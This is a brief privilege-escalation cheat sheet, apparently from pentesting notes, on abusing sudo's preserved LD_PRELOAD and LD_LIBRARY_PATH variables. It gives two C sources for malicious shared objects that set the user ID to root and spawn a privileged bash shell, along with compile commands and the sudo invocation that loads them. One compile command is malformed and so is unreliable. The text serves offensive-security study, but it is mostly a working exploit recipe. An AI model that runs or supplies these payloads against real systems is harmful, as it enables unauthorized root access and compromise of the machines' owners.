Skip to content

Sudo Environment Variables

LD_PRELOAD

If LD_PRELOAD is set it will load whatever shared object is set before anything else.

malicious shared object
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

Compile with: gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c

LD_LIBRARY_PATH

LD_LIBRARY_PATH is an environment variable that contains the directories where shared libraries are searched for first.

Show the shared objects used by a program
ldd
ldd /usr/bin/apache2

Output: shared objects, choose one to replace

Replace a shared object with a malicious one.

Malicious shared object
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {unsetenv("LD_LIBRARY_PATH");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

Compile with: gcc -o -shared -fPIC library_path.c

title=="Run command with malicious shared object" sudo LD_LIBRARY_PATH=<Malicious .so directory> <sudo command>